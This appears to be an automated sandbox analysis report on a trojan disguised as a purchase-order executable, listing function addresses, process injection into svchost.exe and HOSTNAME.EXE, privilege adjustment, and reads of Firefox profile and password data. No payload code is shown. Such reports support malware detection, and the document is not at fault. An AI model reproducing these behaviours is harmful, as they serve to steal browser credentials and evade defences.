Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035003E6	2_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C02C0	2_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430100	2_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F81CC	2_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035001AA	2_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464750	2_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C6E0	2_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03500591	2_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F2446	2_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4420	2_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EE4F6	2_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F6BD7	2_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350A9A6	2_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344A840	2_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E8F0	2_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034268B8	2_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03482F28	2_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460F30	2_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E2F30	2_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432FC8	2_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344CFE0	2_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BEFA0	2_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440E59	2_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEE26	2_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEEDB	2_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452E90	2_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FCE93	2_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344AD00	2_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DCD1F	2_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343ADE0	2_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03458DBF	2_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440C00	2_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430CF2	2_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0CB5	2_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342D34C	2_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F132D	2_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0348739A	2_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B2C0	2_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E12ED	2_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034452A0	2_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347516C	2_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342F172	2_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350B16B	2_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344B1B0	2_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EF0CC	2_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034470C0	2_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F70E9	2_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF0E0	2_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF7B0	2_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F16CC	2_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7571	2_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DD5B0	2_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03431460	2_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF43F	2_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFB76	2_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B5BF0	2_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347DBF9	2_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FB80	2_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFA49	2_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7A46	2_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B3A6C	2_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EDAC6	2_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DDAAC	2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485AA0	2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E1AA3	2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449950	2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B950	2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D5910	2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AD800	2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034438E0	2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFF09	2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03441F92	2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFFB1	2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449EB0	2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03443D40	2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F1D5A	2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7D73	2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FDC0	2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B9C32	2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFCF2	2_2_034FFCF2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03BA03E6	12_2_03BA03E6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AEE3F0	12_2_03AEE3F0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9A352	12_2_03B9A352
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B602C0	12_2_03B602C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B80274	12_2_03B80274
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03BA01AA	12_2_03BA01AA
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B981CC	12_2_03B981CC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AD0100	12_2_03AD0100
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B7A118	12_2_03B7A118
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B68158	12_2_03B68158
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B72000	12_2_03B72000
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03ADC7C0	12_2_03ADC7C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE0770	12_2_03AE0770
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B04750	12_2_03B04750
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AFC6E0	12_2_03AFC6E0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03BA0591	12_2_03BA0591
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE0535	12_2_03AE0535
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B8E4F6	12_2_03B8E4F6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B84420	12_2_03B84420
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B92446	12_2_03B92446
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B96BD7	12_2_03B96BD7
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9AB40	12_2_03B9AB40
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03ADEA80	12_2_03ADEA80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE29A0	12_2_03AE29A0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03BAA9A6	12_2_03BAA9A6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AF6962	12_2_03AF6962
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AC68B8	12_2_03AC68B8
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B0E8F0	12_2_03B0E8F0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE2840	12_2_03AE2840
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AEA840	12_2_03AEA840
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B5EFA0	12_2_03B5EFA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AECFE0	12_2_03AECFE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AD2FC8	12_2_03AD2FC8
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B00F30	12_2_03B00F30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B82F30	12_2_03B82F30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B22F28	12_2_03B22F28
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B54F40	12_2_03B54F40
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9CE93	12_2_03B9CE93
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AF2E90	12_2_03AF2E90
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9EEDB	12_2_03B9EEDB
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9EE26	12_2_03B9EE26
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE0E59	12_2_03AE0E59
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AF8DBF	12_2_03AF8DBF
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03ADADE0	12_2_03ADADE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B7CD1F	12_2_03B7CD1F
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AEAD00	12_2_03AEAD00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B80CB5	12_2_03B80CB5
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AD0CF2	12_2_03AD0CF2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE0C00	12_2_03AE0C00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B2739A	12_2_03B2739A
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9132D	12_2_03B9132D
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03ACD34C	12_2_03ACD34C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE52A0	12_2_03AE52A0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B812ED	12_2_03B812ED
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AFB2C0	12_2_03AFB2C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AEB1B0	12_2_03AEB1B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03BAB16B	12_2_03BAB16B
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B1516C	12_2_03B1516C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03ACF172	12_2_03ACF172
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B970E9	12_2_03B970E9
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9F0E0	12_2_03B9F0E0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE70C0	12_2_03AE70C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B8F0CC	12_2_03B8F0CC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9F7B0	12_2_03B9F7B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B916CC	12_2_03B916CC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B7D5B0	12_2_03B7D5B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B97571	12_2_03B97571
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9F43F	12_2_03B9F43F
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AD1460	12_2_03AD1460
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AFFB80	12_2_03AFFB80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B55BF0	12_2_03B55BF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B1DBF9	12_2_03B1DBF9
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9FB76	12_2_03B9FB76
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B25AA0	12_2_03B25AA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B7DAAC	12_2_03B7DAAC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B81AA3	12_2_03B81AA3
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B8DAC6	12_2_03B8DAC6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B53A6C	12_2_03B53A6C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9FA49	12_2_03B9FA49
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B97A46	12_2_03B97A46
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B75910	12_2_03B75910
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE9950	12_2_03AE9950
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AFB950	12_2_03AFB950
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE38E0	12_2_03AE38E0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B4D800	12_2_03B4D800
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9FFB1	12_2_03B9FFB1
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE1F92	12_2_03AE1F92
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9FF09	12_2_03B9FF09
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE9EB0	12_2_03AE9EB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AFFDC0	12_2_03AFFDC0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B97D73	12_2_03B97D73
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B91D5A	12_2_03B91D5A
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AE3D40	12_2_03AE3D40
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B9FCF2	12_2_03B9FCF2
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B59C32	12_2_03B59C32
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C21F0	12_2_032C21F0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032BB3C4	12_2_032BB3C4
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032BB3D0	12_2_032BB3D0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032BB280	12_2_032BB280
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032BD290	12_2_032BD290
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032BD06C	12_2_032BD06C
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032BD070	12_2_032BD070
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C3AAC	12_2_032C3AAC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C3AB0	12_2_032C3AB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C58B0	12_2_032C58B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032DBFB0	12_2_032DBFB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_038EE323	12_2_038EE323
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_038EE204	12_2_038EE204
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_038ED788	12_2_038ED788
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_038EE6BC	12_2_038EE6BC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_038EE48B	12_2_038EE48B

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 278 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 102 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 03B4EA12 appears 86 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 03B27E54 appears 101 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 03ACB970 appears 278 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 03B15130 appears 58 times
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: String function: 03B5F290 appears 89 times
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: String function: 00218900 appears 42 times
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: String function: 001F7DE1 appears 35 times
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: String function: 00210AE3 appears 70 times

Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1043381545.000000000392D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PURCHASE ORDER N0259305-06SN.exe
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1042534063.0000000003783000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PURCHASE ORDER N0259305-06SN.exe

Source: PURCHASE ORDER N0259305-06SN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@18/8

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0025A06A GetLastError,FormatMessageW,

0_2_0025A06A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002481CB AdjustTokenPrivileges,CloseHandle,		0_2_002481CB
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_002487E1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0025B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0025B333

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0026EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0026EE0D

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_002683BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_002683BB

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_001F4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001F4E89

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

File created: C:\Users\user\AppData\Local\Temp\aut3AA8.tmp

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HOSTNAME.EXE, 0000000C.00000003.1533331078.00000000035BD000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1530974938.0000000003592000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1531143520.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3492564549.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3492564549.00000000035E0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PURCHASE ORDER N0259305-06SN.exe	Virustotal: Detection: 60%
Source: PURCHASE ORDER N0259305-06SN.exe	ReversingLabs: Detection: 75%

Source: unknown	Process created: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Process created: C:\Windows\SysWOW64\HOSTNAME.EXE "C:\Windows\SysWOW64\HOSTNAME.EXE"
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Process created: C:\Windows\SysWOW64\HOSTNAME.EXE "C:\Windows\SysWOW64\HOSTNAME.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: iertutil.dll	Jump to behavior
